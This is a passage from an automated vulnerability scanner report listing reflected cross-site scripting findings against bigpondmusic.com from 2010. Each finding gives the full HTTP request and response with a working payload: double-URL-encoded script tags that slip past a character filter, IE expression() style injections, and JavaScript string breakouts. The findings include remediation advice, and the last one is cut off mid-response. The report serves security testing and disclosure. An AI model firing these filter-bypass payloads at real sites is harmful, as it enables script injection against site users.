2.250. http://bigpondmusic.com/browse/Albums/NewRelease/Format-Single/By-ReleaseDate [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /browse/Albums/NewRelease/Format-Single/By-ReleaseDate

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed92f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e49c761395d was submitted in the REST URL parameter 5. This input was echoed as ed92f"><script>alert(1)</script>49c761395d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /browse/Albums/NewRelease/Format-Single/By-ReleaseDateed92f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e49c761395d HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:12:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88193


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/browse/Albums/NewRelease/Format-Single/By-ReleaseDateed92f"><script>alert(1)</script>49c761395d" />
...[SNIP]...

2.251. http://bigpondmusic.com/browse/Albums/NewRelease/Format-Single/By-ReleaseDate [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /browse/Albums/NewRelease/Format-Single/By-ReleaseDate

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d43b"style%3d"x%3aexpression(alert(1))"db3f590606e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6d43b"style="x:expression(alert(1))"db3f590606e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work on other browsers.

Request

GET /browse/Albums/NewRelease/Format-Single/By-ReleaseDate?6d43b"style%3d"x%3aexpression(alert(1))"db3f590606e=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:11:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 139032


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>New Release Singles - BigPon
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/browse/Albums/NewRelease/Format-Single/By-ReleaseDate?6d43b"style="x:expression(alert(1))"db3f590606e=1" />
...[SNIP]...

2.252. http://bigpondmusic.com/charts/albums [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /charts/albums

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 958d3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e53304c5ccd0 was submitted in the REST URL parameter 1. This input was echoed as 958d3"><script>alert(1)</script>53304c5ccd0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /charts958d3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e53304c5ccd0/albums HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:11:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88116


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/charts958d3"><script>alert(1)</script>53304c5ccd0/albums" />
...[SNIP]...

2.253. http://bigpondmusic.com/charts/albums [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /charts/albums

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b6a25'%3b0bb2e82f779 was submitted in the REST URL parameter 1. This input was echoed as b6a25';0bb2e82f779 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript, but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /chartsb6a25'%3b0bb2e82f779/albums HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:11:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87784


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
rabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'chartsb6a25';0bb2e82f779';
   s.prop4 = 'albums';
   
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel + '|' + s.prop4;
   s.prop11
...[SNIP]...

2.254. http://bigpondmusic.com/charts/albums [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /charts/albums

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b68ce%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea302a26bbd6 was submitted in the REST URL parameter 2. This input was echoed as b68ce"><script>alert(1)</script>a302a26bbd6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /charts/albumsb68ce%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea302a26bbd6 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:12:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88247


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/charts/albumsb68ce"><script>alert(1)</script>a302a26bbd6" />
...[SNIP]...

2.255. http://bigpondmusic.com/charts/albums [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /charts/albums

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 371a8'%3bb65b865de00 was submitted in the REST URL parameter 2. This input was echoed as 371a8';b65b865de00 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript, but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /charts/albums371a8'%3bb65b865de00 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:12:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88439


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'charts';
   s.prop4 = 'albums371a8';b65b865de00';
   
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel + '|' + s.prop4;
   s.prop11 = 'Non-Registered-Musi
...[SNIP]...

2.256. http://bigpondmusic.com/charts/albums [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /charts/albums

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16824"style%3d"x%3aexpression(alert(1))"37d26c23a91 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 16824"style="x:expression(alert(1))"37d26c23a91 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work on other browsers.

Request

GET /charts/albums?16824"style%3d"x%3aexpression(alert(1))"37d26c23a91=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:11:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 123343


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Top 40 Albums - Album Downlo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/charts/albums?16824"style="x:expression(alert(1))"37d26c23a91=1" />
...[SNIP]...

2.257. http://bigpondmusic.com/charts/albums/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /charts/albums/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1fc2c'%3b6c0fae99ce1 was submitted in the REST URL parameter 1. This input was echoed as 1fc2c';6c0fae99ce1 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript, but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /charts1fc2c'%3b6c0fae99ce1/albums/ HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 02:48:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87992


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
rabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'charts1fc2c';6c0fae99ce1';
   s.prop4 = 'albums';
   
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel + '|' + s.prop4;
   s.prop11
...[SNIP]...

2.258. http://bigpondmusic.com/charts/albums/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /charts/albums/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 177b6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5f9f321415f was submitted in the REST URL parameter 1. This input was echoed as 177b6"><script>alert(1)</script>5f9f321415f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /charts177b6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5f9f321415f/albums/ HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 02:48:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88103


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/charts177b6"><script>alert(1)</script>5f9f321415f/albums/" />
...[SNIP]...

2.259. http://bigpondmusic.com/charts/albums/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /charts/albums/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62a47%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e88635b62e46 was submitted in the REST URL parameter 2. This input was echoed as 62a47"><script>alert(1)</script>88635b62e46 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /charts/albums62a47%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e88635b62e46/ HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 02:48:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88031


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/charts/albums62a47"><script>alert(1)</script>88635b62e46/" />
...[SNIP]...

2.260. http://bigpondmusic.com/charts/albums/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /charts/albums/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8348f'%3b400564b8ae0 was submitted in the REST URL parameter 2. This input was echoed as 8348f';400564b8ae0 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /charts/albums8348f'%3b400564b8ae0/ HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 02:48:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88030


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'charts';
   s.prop4 = 'albums8348f';400564b8ae0';
   
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel + '|' + s.prop4;
   s.prop11 = 'Non-Registered-Musi
...[SNIP]...

2.261. http://bigpondmusic.com/charts/albums/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /charts/albums/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec8c3"style%3d"x%3aexpression(alert(1))"1802bb7a9d7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ec8c3"style="x:expression(alert(1))"1802bb7a9d7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /charts/albums/?ec8c3"style%3d"x%3aexpression(alert(1))"1802bb7a9d7=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 02:48:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 123564


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Top 40 Albums - Album Downlo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/charts/albums/?ec8c3"style="x:expression(alert(1))"1802bb7a9d7=1" />
...[SNIP]...

2.262. http://bigpondmusic.com/charts/albums/ [ref parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /charts/albums/

Issue detail

The value of the ref request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70ac4"style%3d"x%3aexpression(alert(1))"4b25918fdd7 was submitted in the ref parameter. This input was echoed as 70ac4"style="x:expression(alert(1))"4b25918fdd7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /charts/albums/?ref=Net-Head-Music-TopAlbums70ac4"style%3d"x%3aexpression(alert(1))"4b25918fdd7 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:11:46 GMT
